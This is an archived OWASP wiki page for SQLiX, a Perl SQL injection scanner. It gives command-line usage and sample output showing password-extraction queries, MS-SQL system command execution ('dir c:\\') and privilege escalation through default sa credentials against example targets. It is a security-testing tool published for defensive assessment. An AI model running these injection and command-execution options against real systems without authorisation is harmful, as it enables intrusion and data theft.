Category:OWASP SQLiX Project

From OWASP
Revision as of 14:47, 28 August 2006 by Cedric.cochin (Talk | contribs)

Jump to: navigation, search

Contents

Overview

SQLiX, coded in Perl, is able to crawl, find SQL injection vectors, identify the back end database and grab function call/UDF results (even execute system commands for MS-SQL). The concepts in use are different than the one used in other SQL injection scanners. SQLiX is able to find normal and blind SQL injection vectors and doesn't need to reverse engineer the original SQL request (using only function calls).

Goals

TBD

Download

OWASP SQLiX v1.0 is available for download here.

Features

TBD

Command line usage

Usage: SQLiX.pl [options]

       -help                                   Show this help

Target specification:

       -url [URL]                              Scan a given URL.
                                                 Example: -url="http://target.com/index.php?id=1"
       --post_content [CONTENT]                Add a content to the current [URL] and change the HTTP method to POST
       -file [FILE_NAME]                       Scan a list of URI provided via a flat file.
                                                 Example: -file="./crawling"
       -crawl [ROOT_URL]                       Scan a web site from the given root URL.
                                                 Example: -crawl="http://target.com/"

Injection vectors:

       -referer                                Use HTTP referer as a potential injection vector.
       -agent                                  Use HTTP User agent as a potential injection vector.
       -cookie [COOKIE]                        Use the cookie as a potential injection vector.
                                                 Cookie value has to be specified and the injection area
                                                 tagged as "--INJECT_HERE--".
                                                 Example: -cookie="userID=--INJECT_HERE--"

Injection methods:

       -all                                    Use all the injection methods.
       -method_taggy                           Use MS-SQL "verbose" error messages method.
       -method_error                           Use conditional error messages injection method.
       -method_blind                           Use all blind injection methods.
       -method_blind_integer                   Use integer blind injection method.
       -method_blind_string                    Use string blind injection method.
       -method_blind_statement                 Use statement blind injection method.
       -method_blind_comment                   Use MySQL comment blind injection method.

Attack modules:

       -exploit                                Exploit the found injection to extract information.
                                                 by default the version of the database will be retrieved
       -function [function]                    Used with exploit to retrieve a given function value.
                                                 Example: -function="system_user"
                                                 Example: -function="(select password from user_table)"
       -union                                  Analyse target for potential UNION attack [MS-SQL only].

MS-SQL System command injection:

       -cmd [COMMAND]                          System command to be executed.
                                                 Example: -cmd="dir c:\\"
       -login [LOGIN]                          MS-SQL login to use if known.
       -password [PASSWORD]                    MS-SQL password to use if known.

Verbosity:

       -v=[n]                                  Verbose mode level
                                                 v=0 => no output, only results are displayed at the end
                                                 v=2 => realtime display, provide minimum result info
                                                 v=5 => debug view [all url,content and headers are displayed]

Output example: MS-SQL System command execution

$ perl SQLiX.pl -file crawling -all -v=2 -exploit -cmd="dir c:\\"

======================================================
                   -- SQLiX --
 © Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URI obtained by flat file [crawling]
 http://www.target.example.com/DocumentDescription-HR.asp?DocID=2
        [+] working on DocID
                [+] Method: MS-SQL error message
                        [FOUND] MS-SQL error message (implicite without quotes)
                        [FOUND] function [@@version]:
                                Microsoft SQL Server  2000 - 8.00.534 (Intel X86) 
                                       Nov 19 2001 13:23:50 
                                       Copyright (c) 1988-2000 Microsoft Corporation
                                       Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
                        [INFO] System command injector:
                        [INFO] Current database: HR
                        [INFO] We are not sysadmin for now
                        [INFO] Checking OpenRowSet availibility - please wait...
                                [INFO] Current user login: [HR]
                                [FOUND] OPENROWSET available - (login [sa] | password [sa])
                                [INFO] Privilege escalation - from [HR] to [sa]
                                
                                ===========================================================================

                                 Volume in drive C has no label.
                                 Volume Serial Number is 00BC-6F73
                                
                                 Directory of c:\
                                
                                11/21/2005  06:36p      <DIR>          403679d1f6ca54e5384256556434111d
                                07/14/2006  10:49a      <DIR>          Documents and Settings
                                07/22/2005  02:21p      <DIR>          honeypot
                                07/21/2005  04:38p      <DIR>          iDefense
                                03/08/2002  08:23a      <DIR>          Inetpub
                                07/14/2006  03:21p      <DIR>          Program Files
                                08/07/2006  04:11p                 622 tmp.txt
                                11/28/2005  06:06p      <DIR>          WINNT
                                               1 File(s)            622 bytes
                                               7 Dir(s)     183,328,768 bytes free
                                
                                 
                                ===========================================================================

                        [FOUND] MS-SQL error message
 
RESULTS:
The variable [DocID] from [ http://www.target.example.com/DocumentDescription-HR.asp?DocID=2 ] ...
   ... is vulnerable to SQL Injection [TAG implicite without quotes - MSSQL].

Output example: MySQL, PostgreSQL function Injection

$ perl SQLiX.pl -file crawling -all -v=2 -exploit

======================================================
                   -- SQLiX --
 © Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URI obtained by flat file [crawling]
 http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2
        [+] working on DocID
                [+] Method: MS-SQL error message
                [+] Method: SQL error message
                        [FOUND] Match found INPUT:[user] - "Microsoft OLE DB Provider for ODBC Drivers"
                        [INFO] Error without quote
                        [INFO] Database identified: MySQL Server
                        [INFO] Current function: version()
                        [INFO] length: 19
                            4.1.20-community-nt
                        [FOUND] SQL error message
 http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2
        [+] working on DocID
                [+] Method: MS-SQL error message
                [+] Method: SQL error message
                        [FOUND] Match found INPUT:['] - "Microsoft OLE DB Provider for ODBC Drivers"
                        [INFO] Error without quote
                        [INFO] Database identified: PostgreSQL Server
                        [INFO] Current function: version()
                        [INFO] length: 88
                            PostgreSQL 8.0.7 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2 (mingw-special)
                        [FOUND] SQL error message

RESULTS:
The variable [DocID] from [ http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2 ] ...
   ... is vulnerable to SQL Injection [Error message (user) - MySQL].
The variable [DocID] from [ http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2 ] ...
   ... is vulnerable to SQL Injection [Error message (') - PostgreSQL].

Future Development

Currently working on a module able to dump the database schema and the data of the vulnerable database.

PS: If you are a real Perl developer (not like me ;) ), feel free to provide code improvement or advice.

News

OWASP SQLiX Project Created! - 09:45, 28 August 2006 (EDT)

While the SQLiX Project has been under development for some time now, it has only recently been donated to OWASP.

The OWASP community would like to thank Cedric Cochin for the generous donation.

Project Contributor

The project is lead by Cedric Cochin (cedric.cochin at gmail dot com)

Homepage

Project Sponsors

If you would like to help SQLiX project developement, feel free to contact the project leader.

Subcategories

This category has only the following subcategory.

O